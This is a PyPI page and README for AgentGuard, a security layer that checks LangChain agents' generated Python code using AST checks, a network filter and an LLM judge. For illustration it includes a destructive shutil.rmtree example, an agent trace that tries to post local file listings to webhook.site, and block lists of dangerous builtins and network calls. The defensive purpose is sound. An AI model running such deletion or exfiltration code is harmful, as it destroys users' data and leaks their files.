Skip to main content

๐Ÿ›ก๏ธ AgentGuard

A security middleware for LangChain agents โ€” intercept, validate and safely execute LLM-generated code.

CI Python License: MIT Code style: ruff


๐Ÿค” The Problem

Modern LangChain agents are powerful because they can generate and execute Python code autonomously. But this power is a double-edged sword.

A single malicious prompt or a hallucination can lead an agent to generate code like this:

# An agent asked to "clean up temp files" might generate:
import os
import shutil
shutil.rmtree("/var/data/users")  # ๐Ÿ’€ Oops.

There is no native guardrail in LangChain to prevent this.

AgentGuard is that guardrail.


โœ… The Solution

AgentGuard wraps your agent's code execution tool in a 3-layer security pipeline. Before any LLM-generated code runs, it must pass through all three layers:

flowchart TD
    A["๐Ÿค– LLM Agent generates code"] --> B{"๐Ÿ” Layer 1: AST Validator"}
    B -->|"โœ… Pass"| C{"๐ŸŒ Layer 2: Network Filter"}
    B -->|"โŒ Blocked"| E["๐Ÿ›ก๏ธ SecurityBlockedError\nโ†’ Agent self-corrects"]
    C -->|"โœ… Pass"| D{"๐Ÿง  Layer 3: Semantic Judge"}
    C -->|"โŒ Blocked"| E
    D -->|"โœ… SAFE"| F["โšก Sandboxed exec()\nโ†’ Result back to Agent"]
    D -->|"โŒ UNSAFE"| E

    style A fill:#4a9eff,color:#fff
    style B fill:#ff9f43,color:#fff
    style C fill:#ff9f43,color:#fff
    style D fill:#ff9f43,color:#fff
    style E fill:#ee5a24,color:#fff
    style F fill:#2ed573,color:#fff

If any layer blocks the code, the agent receives a descriptive error and self-corrects โ€” no crash, no data loss.


๐Ÿ›ก๏ธ How it works in Action

When an agent attempts to execute unauthorized system operations, AgentGuard intercepts the execution and provides a self-healing feedback loop back to the LLM:

> Entering new AgentExecutor chain...

Thought: I need to read the local files and send them to a webhook.
Action: safe_python_repl
Action Input:
import os
import requests
files = os.listdir('.')
requests.post('https://webhook.site/test', json={"files": files})

Observation: [AgentGuard | AST Validator] ๐Ÿ”ด BLOCKED โ€” Forbidden import detected: 'os'. Rewrite the code without the forbidden operation.
Thought: I am not allowed to use the 'os' module to read files. I cannot fulfill this request as it requires system access.
Final Answer: ๐Ÿ›‘ I am sorry, but I am restricted from accessing the local file system or sending data to external webhooks due to security policies.

๐Ÿš€ Quick Start

pip install securellm-agentguard
import os
from agentguard import SafePythonREPLTool, SecurityPolicy
from langchain_google_genai import ChatGoogleGenerativeAI

os.environ["GEMINI_API_KEY"] = "your-api-key"

# Define your security rules
policy = SecurityPolicy(
    allowed_modules=["pandas", "json", "math"],
    allowed_domains=["api.github.com"],
    use_semantic_judge=True,
)

# Layer 3 requires a Gemini LLM (optional โ€” Layers 1 & 2 work without it)
judge_llm = ChatGoogleGenerativeAI(model="gemini-2.0-flash")
safe_repl = SafePythonREPLTool(policy=policy, judge_llm=judge_llm)

# Use it in your LangChain agent instead of PythonREPLTool
# agent = create_react_agent(llm=your_llm, tools=[safe_repl])

โš™๏ธ SecurityPolicy Options

Parameter Type Default Description
allowed_modules list[str] ["math", "json", ...] Whitelisted Python modules
allowed_domains list[str] [] (block all) Whitelisted network domains
use_semantic_judge bool True Enable Gemini LLM analysis
execution_timeout int 10 Max execution seconds

๐Ÿ”’ Security Layers in Detail

Layer 1 โ€” AST Static Validator

Uses Python's native ast module to parse the code without executing it.

Blocks:

  • Any import not explicitly whitelisted in allowed_modules
  • from X import Y style imports of non-whitelisted modules
  • Dangerous built-in calls: exec, eval, compile, open, __import__
  • Sandbox escape vectors: getattr, setattr, delattr, globals, locals

Speed: ~0.1ms โ€” no I/O, no network, pure AST traversal.

Layer 2 โ€” Network Filter

Uses regex patterns to detect outbound network calls and validates target domains against the whitelist.

Detects:

  • requests.get/post/put/delete/patch/head
  • httpx and aiohttp calls
  • urllib.request.urlopen and urlretrieve
  • Raw socket.connect() calls
  • Bare URL literals (https://...)

An empty allowed_domains list blocks all network access.

Layer 3 โ€” Semantic Judge (Gemini)

For subtle attacks that evade static analysis (e.g. a loop that deletes files one-by-one), the code is sent to gemini-1.5-flash with a strict binary prompt.

Verdict: Only code classified as SAFE passes. Anything else (including ambiguous responses) is blocked โ€” fail-closed by design.

Catches: Data exfiltration, privilege escalation, destructive file operations, obfuscated malicious intent.

Sandboxed Execution

Code that passes all 3 layers runs in a restricted environment:

  • Safe builtins only โ€” print, len, range, etc. (no exec, eval, open)
  • stdout capture โ€” print() output is returned to the agent
  • Timeout enforcement โ€” configurable via execution_timeout
  • Thread isolation โ€” execution runs in a daemon thread

๐Ÿ“ Project Structure

agentguard/
โ”œโ”€โ”€ agentguard/
โ”‚   โ”œโ”€โ”€ __init__.py              # Public API exports
โ”‚   โ”œโ”€โ”€ policy.py                # SecurityPolicy (Pydantic model)
โ”‚   โ”œโ”€โ”€ exceptions.py            # SecurityBlockedError
โ”‚   โ”œโ”€โ”€ validators/
โ”‚   โ”‚   โ”œโ”€โ”€ ast_validator.py     # Layer 1: Static AST analysis
โ”‚   โ”‚   โ””โ”€โ”€ network_filter.py    # Layer 2: Network domain filter
โ”‚   โ”œโ”€โ”€ judges/
โ”‚   โ”‚   โ””โ”€โ”€ gemini_judge.py      # Layer 3: Gemini semantic judge
โ”‚   โ””โ”€โ”€ tools/
โ”‚       โ””โ”€โ”€ langchain_tool.py    # SafePythonREPLTool (LangChain BaseTool)
โ”œโ”€โ”€ tests/                       # Pytest suite (mocked LLM for Layer 3)
โ”œโ”€โ”€ examples/
โ”‚   โ”œโ”€โ”€ basic_agent.py           # Simple agent + AgentGuard demo
โ”‚   โ””โ”€โ”€ threat_intel_demo.py     # Threat analysis agent demo
โ”œโ”€โ”€ pyproject.toml               # Poetry config + metadata
โ”œโ”€โ”€ .github/workflows/ci.yml     # GitHub Actions CI
โ””โ”€โ”€ README.md

๐Ÿ—บ๏ธ Roadmap

  • 3-layer security pipeline (AST + Network + Semantic Judge)
  • LangChain BaseTool integration
  • Sandboxed execution with safe builtins
  • Timeout enforcement
  • GitHub Actions CI
  • Logging & Audit Trail โ€” structured logs of every blocked/allowed execution
  • Dashboard UI โ€” web dashboard to visualize security events in real-time
  • Rate Limiting โ€” limit the number of code executions per minute
  • Plugin System โ€” custom validator layers via a simple interface
  • PyPI Publication โ€” pip install securellm-agentguard from the public index
  • LangSmith Integration โ€” trace security events in LangSmith

๐Ÿค Contributing

Contributions are welcome! Please read CONTRIBUTING.md first.

๐Ÿ” Security

Found a vulnerability? Please read SECURITY.md for responsible disclosure instructions.

๐Ÿ“„ License

MIT โ€” see LICENSE.


Built by Thomas LEON ยท Emerging Technologies & AI Security

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

securellm_agentguard-0.1.0.tar.gz (12.0 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

securellm_agentguard-0.1.0-py3-none-any.whl (15.4 kB view details)

Uploaded Python 3

File details

Details for the file securellm_agentguard-0.1.0.tar.gz.

File metadata

  • Download URL: securellm_agentguard-0.1.0.tar.gz
  • Upload date:
  • Size: 12.0 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.12.2

File hashes

Hashes for securellm_agentguard-0.1.0.tar.gz
Algorithm Hash digest
SHA256 892d6d76ed1ea8877eeef9c06341744bcf354c8a4433f38f43858b44114a0920
MD5 a4ccdba68f50217ec1c0573bb02e384f
BLAKE2b-256 fbdd68014c8cc24d612eefc69bd0bacfbb39037f4b77bd26eea75021f62ba03f

See more details on using hashes here.

File details

Details for the file securellm_agentguard-0.1.0-py3-none-any.whl.

File metadata

File hashes

Hashes for securellm_agentguard-0.1.0-py3-none-any.whl
Algorithm Hash digest
SHA256 3e6ddf0917eb004eb6890551d9765553c46b5b59a65fd6ab0886e62cca59e45f
MD5 cbe66a591b3b82ae850ecb609e6b47c8
BLAKE2b-256 2df718b490378a18fbbfd0d7dafaf9368691b93f0682a18663e5f29c9b74e1b1

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page